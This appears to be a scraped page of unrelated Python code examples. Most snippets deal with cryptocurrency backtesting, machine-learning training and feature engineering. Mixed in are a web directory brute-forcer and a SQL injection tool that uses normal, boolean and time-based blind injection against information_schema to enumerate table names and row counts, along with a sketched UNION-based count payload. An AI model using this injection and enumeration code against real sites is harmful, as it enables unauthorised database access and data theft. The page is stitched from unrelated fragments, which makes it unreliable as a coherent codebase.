def trading_day(day, symbols, signals, order_size=0.1, history=None):
    if signals.empty:  # No signals for this day
        return
    session = DBSession()
    result = pd.DataFrame()
    exchange = Exchange(session)
    for s in symbols:
        # If there's no signal for this coin, skip it
        if not s in signals.columns:
            continue
        signal = signals['{}'.format(s)].iloc[0]
        close = signals['{}_close'.format(s)].iloc[0]
        label = signals['{}_label'.format(s)].iloc[0]

        if np.isnan(signal) or np.isnan(close):  # Skip when signal or close is missing
            continue
        # if history is not None and not history.empty:
        #     signal_history = history['{}'.format(s)]
        #     close_history = history['{}_close'.format(s)]
        #     label_history = history['{}_label'.format(s)]
        # precision = precision_score(label_history.values, signal_history.values, average='micro', zero_division=True)
        # Fit an spline on available historical data, needs at least 7 days of activity
        #history_length = close_history.shape[0]
        #if history_length > 0:
        # Check last label is correct
        #check_signal(label_history.values[-1], close, close_history.values[-1])
        #--
        # hist = close_history.copy()
        # hist.loc[day] = close
        # pct = hist.pct_change().values[-1]
        # if history_length >= 7:
        #     x_space = np.linspace(0, history_length - 1, history_length)
        #     close_spline = UnivariateSpline(x_space, close_history.values, s=0, k=4)
        #     d1 = close_spline(history_length - 1, nu=1)
        #     d2 = close_spline(history_length - 1, nu=2)
        #     logger.info(
        #         "[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {} d1: {} d2: {}".format(
        #             day, s, signal, label, precision, close, pct, d1, d2
        #         ))
        # else:
        #     logger.info("[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {}".format(
        #         day, s, signal, label, precision, close, pct
        #     ))
        #signal = label
        # Grab balance for current symbol
        asset = exchange.get_or_create_asset(s, margin_fiat=10000, coins=0)
        #
        # Order management
        #
        # Manage LONG orders
        open_longs = exchange.get_open_long(asset)
        for o in open_longs:
            # If close meets stop loss, close position
            if o.should_stop(close):
                logger.info(
                    '[Day: {}] Closing long position {} on {} due to stop loss'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, o.stop_loss)
                continue

            # If signal is SELL, close the long position
            if signal == SignalType.SELL:
                logger.info(
                    '[Day: {}] Closing long position {} on {} due to SELL signal'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue

        # Manage SHORT orders
        open_shorts = exchange.get_open_short(asset)
        for o in open_shorts:
            # If close meets stop loss, close position
            if o.should_stop(close):
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to stop loss'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, o.stop_loss)
                continue
            # If signal is BUY we're going to lose money, so we close position
            if signal == SignalType.BUY:
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to BUY signal'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue
            # If signal is HOLD and position is old
            if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD:
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to age'.
                    format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue

        #
        # Open new positions
        #
        # Determine position sizing
        position_coins = asset.position_size(close, order_size)
        # Open the order
        if signal == SignalType.BUY:
            logger.info(
                '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'
                .format(day, s, close, position_coins * close, position_coins))
            o = exchange.open_order(day,
                                    OrderType.LONG,
                                    asset,
                                    position_coins,
                                    close,
                                    stop_loss=-0.01)  # Stop loss is -1%
            if not o:
                logger.error("LONG FAILED")
        elif signal == SignalType.SELL:
            logger.info(
                '[Day: {}] Opening short position on {} due to SELL signal [Close {}, Price {}, Coins {}]'
                .format(day, s, close, position_coins * close, position_coins))
            o = exchange.open_order(day,
                                    OrderType.SHORT,
                                    asset,
                                    position_coins,
                                    close,
                                    stop_loss=0.01)  # Stop loss is +1%
            if not o:
                logger.error("SHORT FAILED")
        # Add result to dataframe
        result.loc[day, s] = asset.equity(close)
    session.commit()
    return result
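Order.should_stop and Asset.position_size are defined elsewhere in this project; a plausible minimal sketch of the stop-loss check, assuming stop_loss is the signed fractional move from the entry price passed to open_order above (-0.01 for longs, +0.01 for shorts):

# Hypothetical sketch of the stop-loss check used above; the real Order model
# lives elsewhere in this project. OrderType comes from the surrounding code.
class Order:
    def __init__(self, order_type, price, stop_loss):
        self.type = order_type                     # OrderType.LONG or OrderType.SHORT
        self.price = price                         # entry price
        self.stop_loss = price * (1 + stop_loss)   # absolute stop price

    def should_stop(self, close):
        if self.type == OrderType.LONG:
            return close <= self.stop_loss   # long: stop once the price falls 1%
        return close >= self.stop_loss       # short: stop once the price rises 1%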
Exemple #35
0
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except Exception:
                    logger.error("Time out...")
                    continue  # the request may otherwise hang

                # Sleep after each request completes
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))

    logger.info("The dictionary queue is empty")
    pbar.close()
    exit(0)
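The example above is Python 2 (urllib2 and the except-comma syntax); a rough Python 3 sketch of the same request loop using requests, where conf, stime, attempt_list, target_url, logger and tqdm are assumed to come from the surrounding program as in the original:

import time
import requests
from urllib.parse import quote

for brute in attempt_list:
    url = "%s%s" % (target_url, quote(brute))
    try:
        response = requests.get(url, headers={"User-Agent": conf['ua']},
                                timeout=2)
    except requests.RequestException:
        logger.error("Time out...")
        continue
    time.sleep(stime)  # sleep after each request
    if response.status_code != 404:
        logger.info("Get !!!!" + url)
        tqdm.write("[%d] => %s" % (response.status_code, url))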

Exemple #36
0
def getDetection():
    logger.info("Received %s" % (request.url))
    return json.dumps(active.getDetection())
Exemple #37
0
def getDetection():
    global DETECTION
    logger.info("DETECTION status %s" %(str(DETECTION)))
    return DETECTION
Exemple #38
0
def print_banner(self):
    logger.info("Searching now in {0}..".format(self.engine_name))
    return
Exemple #39
0
def main():
    index = load_dataset('all_merged', return_index=True)
    resultFile = './data/datasets/all_merged/estimators/randomforest_hyperparameters.json'
    estFile = './data/datasets/all_merged/estimators/randomforest_{}.p'
    hyperparameters = {}
    for _sym, data in index.items():
        features = pd.read_csv(data['csv'],
                               sep=',',
                               encoding='utf-8',
                               index_col='Date',
                               parse_dates=True)
        # Replace infinity with nan so that it can later be imputed to a finite value
        features = features.replace([np.inf, -np.inf], np.nan)
        # Derive target classes from closing price
        target_pct = target_price_variation(features['close'])
        target = target_binned_price_variation(target_pct, n_bins=2)
        # target = target_discrete_price_variation(target_pct)

        # Split data into train and blind test sets with a 70:30 ratio;
        #  most ML models don't take sequentiality into account, but our pipeline
        #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
        X_train, X_test, y_train, y_test = train_test_split(features.values,
                                                            target.values,
                                                            shuffle=False,
                                                            test_size=0.3)
        # Summarize distribution
        print("Training set: # Features {}, # Samples {}".format(
            X_train.shape[1], X_train.shape[0]))
        plot_class_distribution("Training set", _sym, y_train)
        print("Test set: # Features {}, # Samples {}".format(
            X_test.shape[1], X_test.shape[0]))
        plot_class_distribution("Test set", _sym, y_test)
        if not np.isfinite(X_train).all():
            logger.warning("Training x is not finite!")
        if not np.isfinite(y_train).all():
            logger.warning("Training y is not finite!")
        if not np.isfinite(X_test).all():
            logger.warning("Test x is not finite!")
        if not np.isfinite(y_test).all():
            logger.warning("Test y is not finite!")
        # Build pipeline to be used as estimator in bagging classifier
        #  so that each subset of the data is transformed independently
        #  to avoid contamination between folds.
        pipeline = Pipeline([
            (
                'i', SimpleImputer()
            ),  # Replace nan's with the column mean (the imputer's default strategy)
            (
                's', RobustScaler()
            ),  # Scale data in order to center it and increase robustness against noise and outliers
            #('k', SelectKBest()), # Select top 10 best features
            #('u', RandomUnderSampler()),
            ('c', RandomForestClassifier()),
        ])

        # Perform hyperparameter tuning of the ensemble with 5-fold cross validation
        logger.info("Start Grid search")
        CV_rfc = GridSearchCV(estimator=pipeline,
                              param_grid=RANDOMFOREST_PARAM_GRID,
                              cv=5,
                              n_jobs=4,
                              scoring='neg_mean_squared_error',
                              verbose=1)
        CV_rfc.fit(X_train, y_train)
        logger.info("End Grid search")

        # Take the fitted ensemble with tuned hyperparameters
        clf = CV_rfc.best_estimator_

        # Test ensemble's performance on training and test sets
        logger.info("Classification report on train set")
        predictions1 = clf.predict(X_train)
        print(classification_report(y_train, predictions1))
        logger.info("Classification report on test set")
        predictions2 = clf.predict(X_test)
        print(classification_report(y_test, predictions2))
        stats = {
            'score': accuracy_score(y_train, predictions1),
            'mse': mean_squared_error(y_train, predictions1),
            'test_score': accuracy_score(y_test, predictions2),
            'test_mse': mean_squared_error(y_test, predictions2),
            'cv_best_mse': -1 * CV_rfc.best_score_,  # CV score is negated MSE
            # 'cv_results': CV_rfc.cv_results_,
            'cv_bestparams': CV_rfc.best_params_,
        }
        print(stats)
        with open(estFile.format(_sym), 'wb') as f:
            pickle.dump(clf, f)
        hyperparameters[_sym] = {
            'estimator': estFile.format(_sym),
            'stats': stats
        }
        # feature_importances = np.mean([
        #     p.named_steps.c.feature_importances_ for p in clf.estimators_
        # ], axis=0)

        # importances = {X.columns[i]: v for i, v in enumerate(feature_importances)}
        # labeled = {str(k): v for k, v in sorted(importances.items(), key=lambda item: -item[1])}

        # print({
        #     # 'features':sel_features
        #     'feature_importances': labeled,
        #     # 'rank': {l: i + 1 for i, l in enumerate(labeled.keys())},
        # })
        with open(resultFile, 'w') as f:  # Save results at every update
            json.dump(hyperparameters, f, indent=4)
        print("--- end ---")
Exemple #40
0
        # Remove records with duplicate imdbids
        imdb_manager.remove_duplicate_imdb()
        # Back up
        imdb_manager.backup()
        # Export the database to LMDB
        imdb_manager.export2lmdb(lmdb_operator.HOST, lmdb_operator.DB)
        # Export the imdbids to CSV
        imdbcsv_path = imdb_manager.imdbid2csv()

        # lmdb
        # Import the imdbids into LMDB
        lmdb_manager.import_imdbid(imdbcsv_path)
        # Update movies that other sources in LMDB (Atmovies, Douban, …) have, but that the IMDb source did not find
        lmdb_manager.update_imdb_miss_movies()
        # Update movies parsed from the IMDb website
        lmdb_manager.update_imdb_parsed_movies()

        # fixme
        """
        The current approach trusts that the imdbid obtained by imdbpy is correct, prefers the data
        already in the IMDb database, and scrapes the IMDb website only when a movie is missing.
        If the imdbid obtained by imdbpy is wrong, it will never be corrected. How could this be updated automatically?
        """

        ed = datetime.datetime.now()

        message = 'start:%s \t end:%s' % (st, ed)
        logger.info(message)
    except Exception:
        print traceback.format_exc()
        sendmail(traceback.format_exc())
Exemple #41
0
    def get_tables(self):

        # If databases_name has not been set yet, enumerate the databases first
        if len(self.databases_name) == 0:
            logger.debug("Set the parameters of the self.databases_name...")
            SqliDatabases.get_database(self)

        # Enumerate tables_name once for each database_name
        for database_name in self.databases_name:
            # Start on this database_name
            logger.debug("Start sqli databases %s's tables_name" %
                         database_name)
            tables_name = []

            logger.debug("The sqlirequest is %s, start sqli tables..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")
                # First inject to get the number of tables

                tables_number = normal_injection(
                    select='COUNT(*)',
                    source="information_schema.tables",
                    conditions="table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Table account sqli success...The tables_number is %d..." %
                    tables_number)
                print "[*] tables_number: %d" % tables_number

                # Each iteration extracts one table
                for i in trange(int(tables_number),
                                desc="Table sqli...",
                                leave=False,
                                disable=True):
                    # First, the length of the table name
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    table_name_len = normal_injection(
                        select='length(`table_name`)',
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # Then inject the table name
                    logger.debug("Start %dth table name sqli..." % (i + 1))

                    table_name = normal_injection(
                        select='`table_name`',
                        source='information_schema.tables',
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                retVal = build_injection(select="COUNT(`table_name`)",
                                         source="information_schema.tables",
                                         conditions="table_schema = '" +
                                         database_name + "'",
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug(
                    "Tables amount sqli success...The tables_number is %d..." %
                    tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # Then inject the length of the table name
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = build_injection(
                        select="length(`table_name`)",
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # Then inject the table name
                    # Reset table_name
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    for j in trange(int(table_name_len),
                                    desc='%dth Table sqli' % (i + 1),
                                    leave=False):
                        retVal = build_injection(
                            select="ascii(substring(`table_name`," +
                            repr(j + 1) + ",1))",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                retVal = time_injection(select="COUNT(`table_name`)",
                                        source="information_schema.tables",
                                        conditions="table_schema = '" +
                                        database_name + "'",
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug(
                    "Tables amount sqli success...The tables_number is %d..." %
                    tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # Then inject the length of the table name
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = time_injection(select="length(`table_name`)",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" +
                                            database_name + "'",
                                            limit=i,
                                            dealpayload=self.dealpayload,
                                            data=self.Data,
                                            times=self.time,
                                            isCount=True,
                                            sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # Then inject the table name
                    # Reset table_name
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    for j in trange(int(table_name_len),
                                    desc='%dth Table sqli' % (i + 1),
                                    leave=False):
                        retVal = time_injection(
                            select="ascii(substring(`table_name`," +
                            repr(j + 1) + ",1))",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # Append table_name to the list
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            self.tables_name[database_name] = tuple(tables_name)

        print "[*] tables_name list: ", self.tables_name
Exemple #42
0
def getActive():
    global active
    logger.info("active status %s" %(str(active)))
    return active
Exemple #43
0
    def get_content_count(self, database_name, table_name):

        # Start injecting the table contents
        logger.debug("Start sqli table %s content amount..." % table_name)

        # GET requests first
        if self.sqlirequest == "GET":
            logger.debug("The sqlirequest is %s, start sqli content..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                # Inject to get the row count
                content_count = normal_injection(select="count(*)",
                                                 source=database_name + "." +
                                                 table_name,
                                                 dealpayload=self.dealpayload,
                                                 data=self.Data,
                                                 isCount=True,
                                                 sqlirequest=self.sqlirequest)
                logger.debug(
                    "Content amount sqli success...The count is %d..." %
                    content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = build_injection(select="count(*)",
                                         source=database_name + "." +
                                         table_name,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content amount sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = time_injection(select="count(*)",
                                        source=database_name + "." +
                                        table_name,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content amount sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count

        # Then POST requests
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli contents..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                # Inject to get the row count

                content_count = normal_injection(select="count(*)",
                                                 source=database_name + "." +
                                                 table_name,
                                                 dealpayload=self.dealpayload,
                                                 data=self.Data,
                                                 isCount=True,
                                                 sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content amount sqli success...The count is %d..." %
                    content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = build_injection(select="count(*)",
                                         source=database_name + "." +
                                         table_name,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content amount sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = time_injection(select="count(*)",
                                        source=database_name + "." +
                                        table_name,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content amount sqli success...The content_count is %d..."
                    % content_count)

                # Return the content count
                logger.info("[*] content count: %d" % content_count)
                return content_count
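For orientation, the select/source arguments above describe the query SELECT COUNT(*) FROM <database>.<table>. As a rough, hypothetical sketch (the actual payload assembly lives inside normal_injection, which is not shown here), a UNION-based probe for that count could look like:

def example_count_payload(database_name, table_name):
    # Hypothetical sketch only: a UNION-based probe for the row count,
    # assuming a single-column injectable SELECT. The project's real
    # payload construction is handled by normal_injection.
    return "' UNION SELECT COUNT(*) FROM {0}.{1} -- -".format(
        database_name, table_name)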
Exemple #44
from lib.log import logger

if __name__ == '__main__':
    logger.info("test info")
    logger.debug("test debug")
    logger.warning("test warning")
    logger.error("test error")
def build_improved_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]

        ta = _df[entry['features']['ta']]
        ta_7 = _df[entry['features']['ta_7d']]
        cm = _df[entry['features']['cm']]

        ohlcv_stats = pd.DataFrame(index=ohlcv.index)
        #ohlcv_stats['volume'] = ohlcv.volume
        #ohlcv_stats['volume_pct'] = ohlcv.volume.pct_change()
        #ohlcv_stats['close_pct'] = ohlcv.close.pct_change()
        ohlcv_stats['day_range_pct'] = (ohlcv.high - ohlcv.low).pct_change(
        )  # Should always be > 0: price oscillation range for the current day
        ohlcv_stats[
            'direction'] = ohlcv.close - ohlcv.open  # Price direction for the day: green > 0, red < 0. Modulus is the range.

        cm_picked = pd.DataFrame(index=ohlcv.index)
        if 'adractcnt' in cm.columns:
            cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change()
            # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change()
            # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change()
        # if 'splycur' in cm.columns: ## Correlated with volume and close
        #     cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined)
        if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns:
            # Represent miners' earnings (fees + issued coins) vs the amount transacted in that interval
            cm_picked['earned_vs_transacted'] = (
                cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv
        if 'isstotntv' in cm.columns:
            # isstotntv is total number of coins mined in the time interval
            # splycur is total number of coins mined (all time)
            total_mined = cm.isstotntv.rolling(
                365, min_periods=7).sum()  # total mined in a year
            cm_picked['isstot365_isstot1_pct'] = (total_mined /
                                                  cm.isstotntv).pct_change()
        if 'splycur' in cm.columns and 'isstotntv' in cm.columns:
            cm_picked['splycur_isstot1_pct'] = (cm.splycur /
                                                cm.isstotntv).pct_change()
        if 'hashrate' in cm.columns:
            #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change()
            #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change()
            cm_picked['hashrate_pct'] = cm.hashrate.pct_change()
        if 'roi30d' in cm.columns:
            cm_picked['roi30d'] = cm.roi30d
        if 'isstotntv' in cm.columns:
            cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change()
        if 'feetotntv' in cm.columns:
            cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change()
        if 'txtfrcount' in cm.columns:
            cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change()
        if 'vtydayret30d' in cm.columns:
            cm_picked['vtydayret30d'] = cm.vtydayret30d
        if 'isscontpctann' in cm.columns:
            cm_picked['isscontpctann'] = cm.isscontpctann

        ta_picked = pd.DataFrame(index=ta.index)
        # REMA / RSMA are already used and well-established in ATSA.
        # Take the pct change, since we want to encode the relative movement of the EMAs, not their positions
        # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change()
        # ta_picked['rsma_5_20_pct'] = ta.rsma_5_20.pct_change()
        ta_picked['rsma_8_15_pct'] = ta.rsma_8_15.pct_change()
        # ta_picked['rsma_20_50_pct'] = ta.rsma_20_50.pct_change()

        # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices
        # over a certain period of time.
        # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or
        # by taking a moving average of the result.
        # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values.
        # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values
        ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling(
            3).mean() / 100

        # Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows
        # the relationship between two moving averages of a security’s price.
        # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA.
        #  A nine-day EMA of the MACD, called the "signal line," is then plotted on top of the MACD line,
        #  which can function as a trigger for buy and sell signals.
        #  Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security
        #  when the MACD crosses below the signal line.
        #  Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways,
        #  but the more common methods are crossovers, divergences, and rapid rises/falls.
        signal_line = builder.exponential_moving_average(ta.macd_12_26, 9)
        ta_picked['macd_12_26_signal'] = (
            ta.macd_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change(
        )  # Information about slope

        # PPO is identical to the moving average convergence divergence (MACD) indicator,
        # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference.
        signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9)
        ta_picked['ppo_12_26_signal'] = (
            ta.ppo_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change(
        )  # Information about slope

        # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether
        # a stock is being accumulated or distributed.
        # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow.
        # This provides insight into how strong a trend is. If the price is rising but the indicator is falling
        # this indicates that buying or accumulation volume may not be enough to support
        # the price rise and a price decline could be forthcoming.
        # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify
        #           divergences by simply looking at the sign of M.
        #           Another insight would be given by the slope (ie pct_change)
        ta_picked['adi_pct'] = ta.adi.pct_change()
        ta_picked['adi_close_convergence'] = convergence_between_series(
            ta.adi, ohlcv.close, 3)

        # RSI goes from 0 to 100: values <= 20 mean BUY, while values >= 80 mean SELL.
        # Divide it by 100 to get a floating point feature; it makes no sense to pct_change it
        ta_picked['rsi_14_div100'] = ta.rsi_14 / 100

        # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold
        #   signals using both prices and volume data. The oscillator moves between 0 and 100.
        # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold,
        #   although levels of 90 and 10 are also used as thresholds.
        # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while
        #   the price is falling or flat, the price could start rising.
        ta_picked['mfi_14_div100'] = ta.mfi_14 / 100

        # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators
        #   such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator.
        #   It measures momentum on both up and down days and does not smooth results, triggering more frequent
        #   oversold and overbought penetrations. The indicator oscillates between +100 and -100.
        # Many technical traders add a 10-period moving average to this oscillator to act as a signal line.
        #   The oscillator generates a bullish signal when it crosses above the moving average and a
        #   bearish signal when it drops below the moving average.
        ta_picked['cmo_14_div100'] = ta.cmo_14 / 100
        signal_line = builder.simple_moving_average(ta.cmo_14, 10)
        ta_picked['cmo_14_signal'] = (ta.cmo_14 - signal_line) / 100

        # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price.
        # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying.
        # Despite being plotted on a price chart and measured numerically,
        # the actual individual quantitative value of OBV is not relevant.
        # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point,
        # meaning the real number value of OBV arbitrarily depends on the start date.
        # Instead, traders and analysts look to the nature of OBV movements over time;
        # the slope of the OBV line carries all of the weight of analysis. => We want percent change
        ta_picked['obv_pct'] = ta.obv.pct_change()
        ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change()

        # Strong rallies in price should see the force index rise.
        # During pullbacks and sideways movements, the force index will often fall because the volume
        # and/or the size of the price moves gets smaller.
        # => Encoding the percent variation could be a good idea
        ta_picked['fi_13_pct'] = ta.fi_13.pct_change()
        ta_picked['fi_50_pct'] = ta.fi_50.pct_change()

        # The Aroon Oscillator is a trend-following indicator that uses aspects of the
        # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend
        # and the likelihood that it will continue.
        # It moves between -100 and 100. A high oscillator value is an indication of an uptrend
        # while a low oscillator value is an indication of a downtrend.
        ta_picked['ao_14'] = ta.ao_14 / 100

        # The average true range (ATR) is a technical analysis indicator that measures market volatility
        #   by decomposing the entire range of an asset price for that period.
